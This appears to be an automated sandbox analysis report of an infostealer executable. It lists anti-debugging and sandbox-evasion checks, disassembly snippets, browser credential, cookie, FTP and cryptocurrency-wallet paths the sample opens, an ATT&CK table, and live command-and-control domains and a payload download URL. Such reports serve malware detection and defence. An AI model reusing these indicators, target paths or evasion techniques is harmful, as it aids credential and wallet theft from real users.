                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C76 second address: 48E0C8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 movsx edx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e mov si, 7575h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C8A second address: 48E0C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov bx, ax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0C94 second address: 48E0CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0668FAD205h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0CB1 second address: 48E0D78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushfd 0x00000006 jmp 00007F06687C5EF3h 0x0000000b or esi, 5774E5BEh 0x00000011 jmp 00007F06687C5EF9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F06687C5EEEh 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 pushad 0x00000024 push eax 0x00000025 call 00007F06687C5EEDh 0x0000002a pop ecx 0x0000002b pop ebx 0x0000002c mov ecx, 0CC7AF3Dh 0x00000031 popad 0x00000032 test esi, esi 0x00000034 jmp 00007F06687C5EF8h 0x00000039 je 00007F06DAF6356Dh 0x0000003f pushad 0x00000040 mov edi, esi 0x00000042 mov edx, ecx 0x00000044 popad 0x00000045 cmp dword ptr [770E459Ch], 05h 0x0000004c pushad 0x0000004d pushad 0x0000004e push eax 0x0000004f pop ebx 0x00000050 mov bx, cx 0x00000053 popad 0x00000054 jmp 00007F06687C5EF8h 0x00000059 popad 0x0000005a je 00007F06DAF7B619h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F06687C5EEAh 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D78 second address: 48E0D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D7E second address: 48E0D84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D84 second address: 48E0D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0D88 second address: 48E0DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06687C5EF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F06687C5EEAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DB5 second address: 48E0DBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DBB second address: 48E0DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F06687C5EECh 0x00000009 sub ax, F1C8h 0x0000000e jmp 00007F06687C5EEBh 0x00000013 popfd 0x00000014 mov ch, EBh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DE8 second address: 48E0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exeRDTSC instruction interceptor: First address: 48E0DEC second address: 48E0DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Special instruction interceptor: First address: 467EC2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Special instruction interceptor: First address: 467F80 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Special instruction interceptor: First address: 638BA4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Special instruction interceptor: First address: 620881 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Special instruction interceptor: First address: 69FC71 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7780 Thread sleep time: -34017s >= -30000s
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7772 Thread sleep time: -30015s >= -30000s
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7924 Thread sleep time: -210000s >= -30000s
                Source: C:\Users\user\Desktop\mG83m82qhF.exe TID: 7784 Thread sleep time: -34017s >= -30000s
                Source: C:\Users\user\Desktop\mG83m82qhF.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\mG83m82qhF.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\mG83m82qhF.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\mG83m82qhF.exe File opened: NTICE
                Source: C:\Users\user\Desktop\mG83m82qhF.exe File opened: SICE
                Source: C:\Users\user\Desktop\mG83m82qhF.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: mG83m82qhF.exe, 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: steppriflej.xyz
                Source: mG83m82qhF.exe, 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: sendypaster.xyz
                Source: mG83m82qhF.exe, 00000000.00000002.2003875472.0000000000411000.00000040.00000001.01000000.00000003.sdmp; String found in binary or memory: cuddlyready.xyz
                Source: mG83m82qhF.exe, 00000000.00000002.2004579010.0000000000636000.00000040.00000001.01000000.00000003.sdmp; Binary or memory string: p+Program Manager
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.5.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.dr; Binary or memory string: msmpeng.exe
                Source: Amcache.hve.5.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.dr; Binary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match; File source: Process Memory Space: mG83m82qhF.exe PID: 7704, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
                Source: mG83m82qhF.exe; String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\ElectronCash\wallets
                Source: mG83m82qhF.exe; String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: window-state.json
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: mG83m82qhF.exe; String found in binary or memory: Wallets/Exodus
                Source: mG83m82qhF.exe, 00000000.00000003.1456365966.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: Wallets/Ethereum
                Source: mG83m82qhF.exe; String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: mG83m82qhF.exe; String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.json
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.db
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\EFOYFBOLXA
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\EWZCVGNOWT
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\NVWZAPQSQL
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\NWCXBPIUYI
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\PIVFAGEAAV
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\PWCCAWLGRE
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\QCOILOQIKC
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\SUAVTZKNFL
                Source: C:\Users\user\Desktop\mG83m82qhF.exe; Directory queried: C:\Users\user\Documents\ZGGKNSUKOP
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\mG83m82qhF.exe Directory queried: number of queries: 1001
                Source: Yara match, File source: Process Memory Space: mG83m82qhF.exe PID: 7704, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match, File source: Process Memory Space: mG83m82qhF.exe PID: 7704, type: MEMORYSTR
                Source: Yara match, File source: sslproxydump.pcap, type: PCAP
                Source: Yara match, File source: decrypted.memstr, type: MEMORYSTR
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 2 Process Injection | 34 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 41 Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 2 Process Injection | LSASS Memory | 751 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 34 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| mG83m82qhF.exe | 55% | Virustotal | | Browse |
| mG83m82qhF.exe | 63% | ReversingLabs | Win32.Infostealer.Tinba | |
| mG83m82qhF.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
| mG83m82qhF.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s3-w.us-east-1.amazonaws.com | 52.217.136.89 | true | false | | high |
| bitbucket.org | 185.166.143.49 | true | false | | high |
| cuddlyready.xyz | 172.67.150.173 | true | false | | high |
| bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| sendypaster.xyz | true | | unknown |
| steppriflej.xyz | true | | unknown |
| smash-boiling.cyou | true | | unknown |
| https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high |
| supporse-comment.cyou | true | | unknown |
| hosue-billowy.cyou | true | | unknown |
| cuddlyready.xyz | true | | unknown |
| ripe-blade.cyou | true | | unknown |
| greywe-snotty.cyou | true | | unknown |
| https://cuddlyready.xyz/api | true | | unknown |
| pollution-raker.cyou | true | | unknown |
                                                                                                                                    high
                                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64mG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:mG83m82qhF.exe, 00000000.00000003.1426625628.00000000052B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://nsis.sf.net/NSIS_ErrorErrormG83m82qhF.exe, 00000000.00000002.2008684160.0000000005959000.00000002.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609568689.0000000005279000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609519898.00000000052B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.ecosia.org/newtab/mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmG83m82qhF.exe, 00000000.00000003.1427676840.0000000005338000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://dz8aopenkvv6s.cloudfront.netmG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cuddlyready.xyz/piEHmG83m82qhF.exe, 00000000.00000003.1477221056.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1478333037.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=mG83m82qhF.exe, 00000000.00000003.1375336734.0000000005248000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375131190.000000000524B000.00000004.00000800.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1375217920.0000000005248000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cuddlyready.xyz:443/apimG83m82qhF.exe, 00000000.00000003.1456773192.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1630482824.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1456317993.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1427610130.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1609670228.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454484117.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455686356.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1495608790.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454724980.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452841763.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454957001.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455318191.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454050433.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1426197522.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1455516828.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1556861946.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1454264424.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 
00000000.00000003.1455783102.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1452173526.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1372699843.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, mG83m82qhF.exe, 00000000.00000003.1453162697.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgmG83m82qhF.exe, 00000000.00000003.1428065810.000000000529F000.00000004.00000800.00020000.00000000.sdmpfalse
